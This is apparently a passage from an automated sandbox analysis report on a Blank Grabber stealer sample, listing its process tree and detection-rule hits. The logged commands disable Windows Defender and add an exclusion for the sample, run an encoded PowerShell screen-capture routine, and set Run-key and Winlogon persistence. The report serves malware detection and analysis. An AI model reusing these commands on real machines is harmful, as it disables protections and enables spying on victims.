        • conhost.exe (PID: 8492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8604 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8616 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8712 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8660 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8760 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8784 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8920 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8796 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 8288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8896 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8932 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9004 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9020 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 9096 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 9064 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9148 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI66162\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    System Summary

    barindex
    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\agentInto\fontsessionruntime.exe, ProcessId: 7868, TargetFilename: C:\Recovery\fontdrvhost.exe
    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Application Data\Microsoft\Internet Explorer\Quick Launch\tasklist.exe", EventID: 13, EventType: SetValue, Image: C:\agentInto\fontsessionruntime.exe, ProcessId: 7868, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tasklist
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 3288, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ProcessId: 6220, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 3288, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 2484, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6220, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', ProcessId: 7264, ProcessName: powershell.exe
    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Built.exe, ProcessId: 3288, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\ShellComponents\tasklist.exe", EventID: 13, EventType: SetValue, Image: C:\agentInto\fontsessionruntime.exe, ProcessId: 7868, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tasklist
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\ShellComponents\tasklist.exe", EventID: 13, EventType: SetValue, Image: C:\agentInto\fontsessionruntime.exe, ProcessId: 7868, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAI